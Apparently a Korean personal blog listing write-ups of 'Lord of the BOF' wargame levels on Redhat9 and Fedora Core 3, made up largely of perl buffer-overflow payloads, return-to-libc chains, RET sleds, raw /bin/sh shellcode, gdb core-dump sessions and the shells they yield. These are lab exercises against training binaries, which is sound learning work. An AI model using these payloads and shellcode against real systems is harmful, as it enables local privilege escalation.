'Wargame' 카테고리의 글 목록 (2 Page)

iron_golem -> dark_eyes

Wargame/LOB (Fedora3) 2014. 2. 20. 15:46

[iron_golem@Fedora_1stFloor tmp]$ cat ../dark_eyes.c
/*
     The Lord of the BOF : The Fellowship of the BOF
     - dark_eyes
     - Local BOF on Fedora Core 3
     - hint : RET sleding
*/

int main(int argc, char *argv[])
{
     char buffer[256];
     char saved_sfp[4];

     if(argc < 2){
          printf("argv error\n");
          exit(0);
     }

     // save sfp
     memcpy(saved_sfp, buffer+264, 4);

     // overflow!!
     strcpy(buffer, argv[1]);

     // restore sfp
     memcpy(buffer+264, saved_sfp, 4);

     printf("%s\n", buffer);
}

RET Sleding을 하라고 한다.

RET을 여러번 실행시킴으로써, esp와 ebp를 끌어올릴 수 있다.

(RET을 여러번 함으로써 esp를 끌어올리고 새로운 함수로 진입한 뒤, mov %esp,%ebp(esp -> ebp)를 해주기 떄문)

Fedora Core 3에서는 EBP를 기준으로 인자 참조를 한다.

execl의 주소는 0x7a5720 이다.

페이로드의 양쪽을 더블 쿼터로 묶지 않았을 때는 Segmentation Fault가 발생했다.

내가 알기로는 strcpy는 \x20에 영향을 받지않는 것으로 알고있었지만 양쪽을 더블쿼터로 묶는 순간 execl이 정상적으로 실행 됬다...;;

""과 NULL은 다른듯하다.

execve

[iron_golem@Fedora_1stFloor ~]$ ./dark_eyes "`perl -e 'print "a"x268,"\xb9\x84\x04\x08"x3,"\x20\x57\x7a\x00"'`"
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa?燎?퉬퉬 Wz
sh-3.00$ id
uid=502(dark_eyes) gid=502(dark_eyes) groups=501(iron_golem) context=user_u:system_r:unconfined_t
sh-3.00$because of you

'Wargame > LOB (Fedora3)' 카테고리의 다른 글

evil_wizard ->dark_stone (0)	2014.02.24
hell_fire -> evil_wizard (0)	2014.02.20
dark_eyes -> hell_fire (1)	2014.02.20
gate -> iron_golem (0)	2014.02.20

Posted by windowhan

,

gate -> iron_golem

Wargame/LOB (Fedora3) 2014. 2. 20. 15:45

Fedora Core3이라 Ascii-Armor이 적용 되서, 인자를 주기가 매우 어려워졌다.

그래서, Fake EBP기법이나 RET을 이용해서 인자를 맞춰주기로 했다.

(gdb) p execl
$1 = {<text variable, no debug info>} 0x7a5720 <execl>

아스키아머가 적용된 execl함수의 주소다.

그런데 오현이형이 말씀해주신 바로는

./iron_golem `perl -e 'print "a"x264,"\x10\x96\x04\x08","\x23\x57\x7a"'`

이런 식으로 페이로드를 짜면 안된다고 말씀해주셨다.

쉘을 띄우는 역할을 담당하는 shell.c를 만들어 놓고 컴파일 한 뒤, 페이로드 상에서 execl로 실행시켜주는 식이었다.

=====================================================

#include <stdio.h>

int main()
{
     setreuid(geteuid(),geteuid());
     setregid(getegid(),getegid());
     execl("/bin/sh","sh",0);
}

[gate@Fedora_1stFloor ~]$ ./iron_golem `perl -e 'print "a"x264,"\x10\x96\x04\x08","\x23\x57\x7a"'`
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa?#Wz
sh-3.00$ id
uid=501(iron_golem) gid=501(iron_golem) groups=500(gate) context=user_u:system_r:unconfined_t
sh-3.00$ my-pass
euid = 501
blood on the fedora

'Wargame > LOB (Fedora3)' 카테고리의 다른 글

evil_wizard ->dark_stone (0)	2014.02.24
hell_fire -> evil_wizard (0)	2014.02.20
dark_eyes -> hell_fire (1)	2014.02.20
iron_golem -> dark_eyes (0)	2014.02.20

Posted by windowhan

,

xavius -> death_knight

Wargame/LOB (Redhat9) 2014. 2. 20. 15:45

remote bof다. 바인드 쉘코드 넣고 리턴주소를 브루트포싱으로 때려맞췄다

LOB20_remotebof_sc_bruteforce.py

'Wargame > LOB (Redhat9)' 카테고리의 다른 글

nightmare -> xavius (0)	2014.02.20
succubus -> nightmare (0)	2014.02.20
zombie_assassin -> succubus (0)	2014.02.20
assassin -> zombie_assassin (0)	2014.02.20
giant -> assassin (0)	2014.02.20

Posted by windowhan

,

nightmare -> xavius

Wargame/LOB (Redhat9) 2014. 2. 20. 15:40

fgets 임시버퍼 공간을 이용했음.ㅋ

[nightmare@localhost nightmare]$ (perl -e 'print "\x90"x16,"\xeb\x08\xb8\xe0\x8a\x05\x40\xff\xd0\xf4\xe8\xf3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x3b\x70\x61\x73\x73\x3b","\x04\x50\x01\x40"';cat)|./xavius
id
???????????????멘?@奇拗/bin/sh;pass;P@id

Xshellid
/bin/sh: Xshellid: command not found
id
uid=518(nightmare) gid=518(nightmare) euid=519(xavius) egid=519(xavius) groups=518(nightmare)
pass^H^H^H^H^H^Hmy-pass
/bin/shmy-pass: command not found
my-pass
euid = 519
throw me away

'Wargame > LOB (Redhat9)' 카테고리의 다른 글

xavius -> death_knight (0)	2014.02.20
succubus -> nightmare (0)	2014.02.20
zombie_assassin -> succubus (0)	2014.02.20
assassin -> zombie_assassin (0)	2014.02.20
giant -> assassin (0)	2014.02.20

Posted by windowhan

,

succubus -> nightmare

Wargame/LOB (Redhat9) 2014. 2. 20. 15:40

[succubus@localhost succubus]$ ./nightmare `perl -e 'print "aaaa"x3,"\xe0\x8a\x05\x40","bbbb","\xf9\xbf\x0f\x40","\x10\x84\x04\x08"x6,"aaaa","\xa0\xfa\xff\xbf","\x7c\xfa\xff\xbf"'`
aaaaaaaaaaaa?@bbbb廈@??????aaaa????
bash$ my-pass
euid = 518
beg for me
bash$

.plt = Procedure Linkable Table

함수들 링크가 가능한 테이블

프로그램이 호출하는 모든 함수가 나열되어 있다.

컴파일 타임에 생성되는 테이블로 어떠한 GOT 영역의 주소를 참조 할지 정해져 있음.

프로그램에서 함수를 호출할 때, 운영체제의 라이브러리에서 호출해오는데 libc의 버전에 따라 호출 형태나 링크 형태가 달라질 수 있기 때문에 그 영향을 받지 않기 위해서 함수의 기계어 코드를 실행 파일이 직접 가질 수 있게 하는 테이블임.

그런데 여기서

/*
        The Lord of the BOF : The Fellowship of the BOF
        - nightmare
        - PLT
*/
#include
#include
#include
#include
main(int argc, char *argv[])
{
        char buffer[40];
        char *addr;
        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }
        // check address
        addr = (char *)&strcpy;
        if(memcmp(argv[1]+44, &addr, 4) != 0){
                printf("You must fall in love with strcpy()\n");
                exit(0);
        }
        // overflow!
        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);
        // dangerous waterfall
        memset(buffer+40+8, 'A', 4);
}

문제 위에 plt라고 되어있던 부분은 plt를 찾아서 공부하란 의미인 것 같고, 실제 문제는 buffer+48부분에 AAAA로 덮는 부분이엇다.

이부분을 strcpy를 이용해 내가 원하는 데이터로 덮어버리면 성공

'Wargame > LOB (Redhat9)' 카테고리의 다른 글

xavius -> death_knight (0)	2014.02.20
nightmare -> xavius (0)	2014.02.20
zombie_assassin -> succubus (0)	2014.02.20
assassin -> zombie_assassin (0)	2014.02.20
giant -> assassin (0)	2014.02.20

Posted by windowhan

,

zombie_assassin -> succubus

Wargame/LOB (Redhat9) 2014. 2. 20. 15:39

[zombie_assassin@localhost zombie_assassin]$ ./succubus `perl -e 'print "a"x44,"\xec\x87\x04\x08","\xbc\x87\x04\x08","\x8c\x87\x04\x08","\x5c\x87\x04\x08","\x24\x87\x04\x08","bbbb","\x58\xfa\xff\xbf","/bin/sh"'`
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa?펶??\?$?bbbbX??bin/sh
welcome to the DO!
welcome to the GYE!
welcome to the GUL!
welcome to the YUT!
welcome to the MO!
bash$ my-pass
euid = 517
here to stay
bash$

'Wargame > LOB (Redhat9)' 카테고리의 다른 글

nightmare -> xavius (0)	2014.02.20
succubus -> nightmare (0)	2014.02.20
assassin -> zombie_assassin (0)	2014.02.20
giant -> assassin (0)	2014.02.20
bugbear -> giant (0)	2014.02.20

Posted by windowhan

,

assassin -> zombie_assassin

Wargame/LOB (Redhat9) 2014. 2. 20. 15:39

Xshell 4 (Build 0127)
Copyright (c) 2002-2013 NetSarang Computer, Inc. All rights reserved.

Type `help' to learn how to use Xshell prompt.
Xshell:\>

Connecting to 192.168.232.128:23...
Connection established.
To escape to local shell, press 'Ctrl+Alt+]'.
                                            _______________________
_______________________-------------------                       `\
/:--__                                                              |
||< > |                                   ___________________________/
| \__/_________________-------------------                         |
|                                                                  |
|        The Lord of the BOF : The Fellowship of the BOF, 2010    |
|                                                                  |
|                                                                  |
|       [enter to the dungeon]                                    |
|       gate : gate                                                |
|                                                                  |
|       [RULE]                                                     |
   |      - do not use local root exploit                             |
   |      - do not use LD_PRELOAD to my-pass                          |
   |      - do not use single boot                    [h4ck3rsch001] |
|                                              ____________________|_
| ___________________-------------------------                      `\
|/`--_                                                                 |
||[ ]||                                            ___________________/
   \===/___________________--------------------------

login: assassin
Password:
Last login: Fri Sep 6 14:24:49 from 192.168.232.1
[assassin@localhost assassin]$ bash2
[assassin@localhost assassin]$ ./zombie_assassin `perl -e 'print "aaaa","\xe0\x8a\x05\x40","bbbb","\xf9\xbf\x0f\x40","b"x24,"\xf3\xfb\xff\xbf"'`
aaaa?@bbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb釵
Segmentation fault
[assassin@localhost assassin]$ cd tmp
[assassin@localhost tmp]$ ls
core fs fs.c zombie_assassin
[assassin@localhost tmp]$ gdb -q ./zombie_assassin ./core
Core was generated by `./zombie_assassin aaaa?@bbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb釵?.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...Xshelldone.
Reading symbols from /lib/ld-linux.so.2...done.
#0 0x0 in ?? ()
(gdb) x/1000s 0xbffffb00
0xbffffb00:     "\225?엔?풾??205?엔?옇?왠?욍?웡??016?026???풪?퓀?오왔?
0xbffffb51:     ""
0xbffffb52:     ""
0xbffffb53:     ""
0xbffffb54:     "\003"
0xbffffb56:     ""
0xbffffb57:     ""
0xbffffb58:     "4\200\004\b\004"
0xbffffb5e:     ""
0xbffffb5f:     ""
0xbffffb60:     " "
0xbffffb62:     ""
0xbffffb63:     ""
0xbffffb64:     "\005"
0xbffffb66:     ""
0xbffffb67:     ""
0xbffffb68:     "\006"
0xbffffb6a:     ""
0xbffffb6b:     ""
0xbffffb6c:     "\006"
0xbffffb6e:     ""
0xbffffb6f:     ""
0xbffffb70:     ""
0xbffffb71:     "\020"
0xbffffb73:     ""
0xbffffb74:     "\a"
0xbffffb76:     ""
0xbffffb77:     ""
0xbffffb78:     ""
0xbffffb79:     ""
---Type <return> to continue, or q <return> to quit---
0xbffffb7a:     ""
0xbffffb7b:     "@\b"
0xbffffb7e:     ""
0xbffffb7f:     ""
0xbffffb80:     ""
0xbffffb81:     ""
0xbffffb82:     ""
0xbffffb83:     ""
0xbffffb84:     "\t"
0xbffffb86:     ""
0xbffffb87:     ""
0xbffffb88:     "\220\203\004\b\013"
0xbffffb8e:     ""
0xbffffb8f:     ""
0xbffffb90:     "\003\002"
0xbffffb93:     ""
0xbffffb94:     "\f"
0xbffffb96:     ""
0xbffffb97:     ""
0xbffffb98:     "\003\002"
0xbffffb9b:     ""
0xbffffb9c:     "\r"
0xbffffb9e:     ""
0xbffffb9f:     ""
0xbffffba0:     "\003\002"
0xbffffba3:     ""
0xbffffba4:     "\016"
0xbffffba6:     ""
0xbffffba7:     ""
0xbffffba8:     "\003\002"
---Type <return> to continue, or q <return> to quit---
0xbffffbab:     ""
0xbffffbac:     "\020"
0xbffffbae:     ""
0xbffffbaf:     ""
0xbffffbb0:     "魂\017\017"
0xbffffbb6:     ""
0xbffffbb7:     ""
0xbffffbb8:     "珹?
0xbffffbbd:     ""
0xbffffbbe:     ""
0xbffffbbf:     ""
0xbffffbc0:     ""
0xbffffbc1:     ""
0xbffffbc2:     ""
0xbffffbc3:     ""
0xbffffbc4:     ""
0xbffffbc5:     ""
0xbffffbc6:     ""
0xbffffbc7:     ""
0xbffffbc8:     ""
0xbffffbc9:     ""
0xbffffbca:     ""
0xbffffbcb:     ""
0xbffffbcc:     ""
0xbffffbcd:     ""
0xbffffbce:     ""
0xbffffbcf:     ""
0xbffffbd0:     ""
0xbffffbd1:     ""
0xbffffbd2:     ""
---Type <return> to continue, or q <return> to quit---
0xbffffbd3:     ""
0xbffffbd4:     ""
0xbffffbd5:     ""
0xbffffbd6:     ""
0xbffffbd7:     ""
0xbffffbd8:     ""
0xbffffbd9:     ""
0xbffffbda:     ""
0xbffffbdb:     ""
0xbffffbdc:     ""
0xbffffbdd:     ""
0xbffffbde:     ""
0xbffffbdf:     ""
0xbffffbe0:     "i686"
0xbffffbe5:     "./zombie_assassin"
0xbffffbf7:     "aaaa?212\005@bbbb廈\017@", 'b' <repeats 24 times>, "釵?
0xbffffc24:     "PWD=/home/assassin/tmp"
0xbffffc3b:     "REMOTEHOST=192.168.232.1"
0xbffffc54:     "HOSTNAME=localhost.localdomain"
0xbffffc73:     "LESSOPEN=|/usr/bin/lesspipe.sh %s"
0xbffffc95:     "USER=assassin"
0xbffffca3:     "LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:mi=01;05;37;41:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.sh=01;32:*.csh=01"...
0xbffffd6b:     ";32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.bz=01;31:*.tz=01;31:*.rpm=01;31:*.cpio=01;31:*.jpg=01;35:*.gif=01;35:*.bmp=01;3"...
0xbffffe33:     "5:*.xbm=01;35:*.xpm=01;35:*.png=01;35:*.tif=01;35:"
0xbffffe66:     "MACHTYPE=i386-redhat-linux-gnu"
0xbffffe85:     "MAIL=/var/spool/mail/assassin"
0xbffffea3:     "INPUTRC=/etc/inputrc"
0xbffffeb8:     "BASH_ENV=/home/assassin/.bashrc"
---Type <return> to continue, or q <return> to quit---ㅂ
0xbffffed8:     "LANG=en_US"
0xbffffee3:     "DISPLAY=192.168.232.1:0.0"
0xbffffefd:     "LOGNAME=assassin"
0xbfffff0e:     "SHLVL=2"
0xbfffff16:     "USERNAME="
0xbfffff20:     "SHELL=/bin/bash"
0xbfffff30:     "HOSTTYPE=i386"
0xbfffff3e:     "HISTSIZE=1000"
0xbfffff4c:     "OSTYPE=linux-gnu"
0xbfffff5d:     "TERM=xterm"
0xbfffff68:     "HOME=/home/assassin"
0xbfffff7c:     "PATH=/usr/local/bin:/bin:/usr/bin:/usr/X11R6/bin:/home/assassin/bin"
0xbfffffc0:     "_=./zombie_assassin"
0xbfffffd4:     "OLDPWD=/home/assassin"
0xbfffffea:     "./zombie_assassin"
0xbffffffc:     ""
0xbffffffd:     ""
0xbffffffe:     ""
0xbfffffff:     ""
0xc0000000:     <Address 0xc0000000 out of bounds>
0xc0000000:     <Address 0xc0000000 out of bounds>
0xc0000000:     <Address 0xc0000000 out of bounds>
0xc0000000:     <Address 0xc0000000 out of bounds>
0xc0000000:     <Address 0xc0000000 out of bounds>
0xc0000000:     <Address 0xc0000000 out of bounds>
0xc0000000:     <Address 0xc0000000 out of bounds>
0xc0000000:     <Address 0xc0000000 out of bounds>
0xc0000000:     <Address 0xc0000000 out of bounds>
0xc0000000:     <Address 0xc0000000 out of bounds>
0xc0000000:     <Address 0xc0000000 out of bounds>
---Type <return> to continue, or q <return> to quit---q
Quit
(gdb) x/100x 0xbfffffb7
0xbfffffb7:     0x6e697373     0x6e69622f     0x2e3d5f00     0x6d6f7a2f
0xbfffffc7:     0x5f656962     0x61737361     0x6e697373     0x444c4f00
0xbfffffd7:     0x3d445750     0x6d6f682f     0x73612f65     0x73736173
0xbfffffe7:     0x2e006e69     0x6d6f7a2f     0x5f656962     0x61737361
0xbffffff7:     0x6e697373     0x00000000     Cannot access memory at address 0xbfffffff
(gdb) x/100x 0xbffffbf7
0xbffffbf7:     0x61616161     0x40058ae0     0x62626262     0x400fbff9
0xbffffc07:     0x62626262     0x62626262     0x62626262     0x62626262
0xbffffc17:     0x62626262     0x62626262     0xbffffbf3     0x44575000
0xbffffc27:     0x6f682f3d     0x612f656d     0x73617373     0x2f6e6973
0xbffffc37:     0x00706d74     0x4f4d4552     0x4f484554     0x313d5453
0xbffffc47:     0x312e3239     0x322e3836     0x312e3233     0x534f4800
0xbffffc57:     0x4d414e54     0x6f6c3d45     0x686c6163     0x2e74736f
0xbffffc67:     0x61636f6c     0x6d6f646c     0x006e6961     0x5353454c
0xbffffc77:     0x4e45504f     0x752f7c3d     0x622f7273     0x6c2f6e69
0xbffffc87:     0x70737365     0x2e657069     0x25206873     0x53550073
0xbffffc97:     0x613d5245     0x73617373     0x006e6973     0x435f534c
0xbffffca7:     0x524f4c4f     0x6f6e3d53     0x3a30303d     0x303d6966
0xbffffcb7:     0x69643a30     0x3b31303d     0x6c3a3433     0x31303d6e
0xbffffcc7:     0x3a36333b     0x343d6970     0x33333b30     0x3d6f733a
0xbffffcd7:     0x333b3130     0x64623a35     0x3b30343d     0x303b3333
0xbffffce7:     0x64633a31     0x3b30343d     0x303b3333     0x726f3a31
0xbffffcf7:     0x3b31303d     0x333b3530     0x31343b37     0x3d696d3a
0xbffffd07:     0x303b3130     0x37333b35     0x3a31343b     0x303d7865
0xbffffd17:     0x32333b31     0x632e2a3a     0x303d646d     0x32333b31
0xbffffd27:     0x652e2a3a     0x303d6578     0x32333b31     0x632e2a3a
0xbffffd37:     0x303d6d6f     0x32333b31     0x622e2a3a     0x303d6d74
0xbffffd47:     0x32333b31     0x622e2a3a     0x303d7461     0x32333b31
0xbffffd57:     0x732e2a3a     0x31303d68     0x3a32333b     0x73632e2a
0xbffffd67:     0x31303d68     0x3a32333b     0x61742e2a     0x31303d72
0xbffffd77:     0x3a31333b     0x67742e2a     0x31303d7a     0x3a31333b
(gdb) q
[assassin@localhost tmp]$ ./zombie_assassin `perl -e 'print "aaaa","\xe0\x8a\x05\x40","bbbb","\xf9\xbf\x0f\x40","b"x24,"\xf7\xfb\xff\xbf","\xdf\x84\x04\x08"'`
aaaa?@bbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb瓣욀?
Segmentation fault (core dumped)
[assassin@localhost tmp]$ gdb -q ./zombie_assassin ./core
Core was generated by `./zombie_assassin aaaa?@bbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb瓣욀?'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...Xshelldone.
Reading symbols from /lib/ld-linux.so.2...done.
#0 0x62626262 in ?? ()
(gdb) q
[assassin@localhost tmp]$ ./zombie_assassin `perl -e 'print "aaaa","\xe0\x8a\x05\x40","bbbb","\xf9\xbf\x0f\x40","b"x24,"\xf3\xfb\xff\xbf","\xdf\x84\x04\x08"'`
aaaa?@bbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb釵욀?
bash$ exit
exit
Segmentation fault (core dumped)
[assassin@localhost tmp]$ cd ../
[assassin@localhost assassin]$ ./zombie_assassin `perl -e 'print "aaaa","\xe0\x8a\x05\x40","bbbb","\xf9\xbf\x0f\x40","b"x24,"\xf3\xfb\xff\xbf","\xdf\x84\x04\x08"'`
aaaa?@bbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb釵욀?
bash$ Xq
sh: Xq: command not found
bash$ exit
exit
Segmentation fault
[assassin@localhost assassin]$ cd tmp
[assassin@localhost tmp]$ gdb -q ./zombie_assassin ./core
Core was generated by `                  aaaaaaaabbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb釵욀?'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
#0 0x62626262 in ?? ()
(gdb) x/100x 0xbffffbf3
0xbffffbf3:     0x61616161     0x61616161     0x62626262     0x400fbff9
0xbffffc03:     0x62626262     0x62626262     0x62626262     0x62626262
0xbffffc13:     0x62626262     0x62626262     0xbffffbf3     0x080484df
0xbffffc23:     0x44575000     0x6f682f3d     0x612f656d     0x73617373
0xbffffc33:     0x2f6e6973     0x00706d74     0x4f4d4552     0x4f484554
0xbffffc43:     0x313d5453     0x312e3239     0x322e3836     0x312e3233
0xbffffc53:     0x534f4800     0x4d414e54     0x6f6c3d45     0x686c6163
0xbffffc63:     0x2e74736f     0x61636f6c     0x6d6f646c     0x006e6961
0xbffffc73:     0x5353454c     0x4e45504f     0x752f7c3d     0x622f7273
0xbffffc83:     0x6c2f6e69     0x70737365     0x2e657069     0x25206873
0xbffffc93:     0x53550073     0x613d5245     0x73617373     0x006e6973
0xbffffca3:     0x435f534c     0x524f4c4f     0x6f6e3d53     0x3a30303d
0xbffffcb3:     0x303d6966     0x69643a30     0x3b31303d     0x6c3a3433
0xbffffcc3:     0x31303d6e     0x3a36333b     0x343d6970     0x33333b30
0xbffffcd3:     0x3d6f733a     0x333b3130     0x64623a35     0x3b30343d
0xbffffce3:     0x303b3333     0x64633a31     0x3b30343d     0x303b3333
0xbffffcf3:     0x726f3a31     0x3b31303d     0x333b3530     0x31343b37
0xbffffd03:     0x3d696d3a     0x303b3130     0x37333b35     0x3a31343b
0xbffffd13:     0x303d7865     0x32333b31     0x632e2a3a     0x303d646d
0xbffffd23:     0x32333b31     0x652e2a3a     0x303d6578     0x32333b31
0xbffffd33:     0x632e2a3a     0x303d6d6f     0x32333b31     0x622e2a3a
0xbffffd43:     0x303d6d74     0x32333b31     0x622e2a3a     0x303d7461
0xbffffd53:     0x32333b31     0x732e2a3a     0x31303d68     0x3a32333b
0xbffffd63:     0x73632e2a     0x31303d68     0x3a32333b     0x61742e2a
0xbffffd73:     0x31303d72     0x3a31333b     0x67742e2a     0x31303d7a
(gdb) x/x 0xbffffbf3
0xbffffbf3:     0x61616161
(gdb)
0xbffffbf7:     0x61616161
(gdb)
0xbffffbfb:     0x62626262
(gdb)
0xbffffbff:     0x400fbff9
(gdb) x/x 0xbffffbf3+4
0xbffffbf7:     0x61616161
(gdb)
0xbffffbfb:     0x62626262
(gdb)
0xbffffbff:     0x400fbff9
(gdb)
0xbffffc03:     0x62626262
(gdb) q
[assassin@localhost tmp]$ cd ../
[assassin@localhost assassin]$ ./zombie_assassin `perl -e 'print "aaaa","\xe0\x8a\x05\x40","bbbb","\xf9\xbf\x0f\x40","b"x24,"\xf3\xfb\xff\xbf","\xdf\x84\x04\x08"'`
aaaa?@bbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb釵욀?
bash$ id
uid=515(assassin) gid=515(assassin) euid=516(zombie_assassin) egid=516(zombie_assassin) groups=515(assassin)
bash$ my-pass
euid = 516
no place to hide
bash$

'Wargame > LOB (Redhat9)' 카테고리의 다른 글

succubus -> nightmare (0)	2014.02.20
zombie_assassin -> succubus (0)	2014.02.20
giant -> assassin (0)	2014.02.20
bugbear -> giant (0)	2014.02.20
darkknight -> bugbear (0)	2014.02.20

Posted by windowhan

,

giant -> assassin

Wargame/LOB (Redhat9) 2014. 2. 20. 15:22

Breakpoint 1, 0x804851d in main ()
(gdb) cont
Continuing.

기억은 않나지만 ret sleding 으로 풀지않았을까... 생각한다.

Program received signal SIGSEGV, Segmentation fault.
0x0 in ?? ()
(gdb) r `perl -e 'print "\x1e\x85\x04\x08"x34'` `perl -e 'print "\x90"x200,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/giant/tmp/assassin `perl -e 'print "\x1e\x85\x04\x08"x34'` `perl -e 'print "\x90"x200,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
c…

Breakpoint 1, 0x804851d in main ()
(gdb) cont
Continuing.

Program received signal SIGTRAP, Trace/breakpoint trap.
0x40001990 in _start () at rtld.c:142
142     rtld.c: No such file or directory.
(gdb) r `perl -e 'print "\x1e\x85\x04\x08"x36'` `perl -e 'print "\x90"x200,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/giant/tmp/assassin `perl -e 'print "\x1e\x85\x04\x08"x36'` `perl -e 'print "\x90"x200,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
co…

Breakpoint 1, 0x804851d in main ()
(gdb) cont
Continuing.

Program received signal SIGTRAP, Trace/breakpoint trap.
0x40001990 in _start () at rtld.c:142
142     rtld.c: No such file or directory.
(gdb) r `perl -e 'print "\x1e\x85\x04\x08"x34'` `perl -e 'print "\x90"x200,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/giant/tmp/assassin `perl -e 'print "\x1e\x85\x04\x08"x34'` `perl -e 'print "\x90"x200,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
co…

Breakpoint 1, 0x804851d in main ()
(gdb) cont
Continuing.

Program received signal SIGTRAP, Trace/breakpoint trap.
0x40001990 in _start () at rtld.c:142
142     rtld.c: No such file or directory.
(gdb) r `perl -e 'print "\x1e\x85\x04\x08"x60'` `perl -e 'print "\x90"x200,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/giant/tmp/assassin `perl -e 'print "\x1e\x85\x04\x08"x60'` `perl -e 'print "\x90"x200,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
…

Breakpoint 1, 0x804851d in main ()
(gdb) cont
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x1000 in ?? ()
(gdb) r `perl -e 'print "\x1e\x85\x04\x08"x60'` `perl -e 'print "\x90"x1000,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/giant/tmp/assassin `perl -e 'print "\x1e\x85\x04\x08"x60'` `perl -e 'print "\x90"x1000,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
…

Breakpoint 1, 0x804851d in main ()
(gdb) cont
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x1000 in ?? ()
(gdb) r `perl -e 'print "\x1e\x85\x04\x08"x45'` `perl -e 'print "\x90"x1000,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/giant/tmp/assassin `perl -e 'print "\x1e\x85\x04\x08"x45'` `perl -e 'print "\x90"x1000,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
…

Breakpoint 1, 0x804851d in main ()
(gdb) cont
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0xbffffd00 in ?? ()
(gdb) x/100x 0xbffffd00
0xbffffd00:     0x69616d6f      0x4f4c006e      0x4d414e47      0x69673d45
0xbffffd10:     0x00746e61      0x4f4d4552      0x4f484554      0x313d5453
0xbffffd20:     0x312e3239      0x322e3836      0x312e3232      0x49414d00
0xbffffd30:     0x762f3d4c      0x732f7261      0x6c6f6f70      0x69616d2f
0xbffffd40:     0x69672f6c      0x00746e61      0x4d524554      0x6574783d
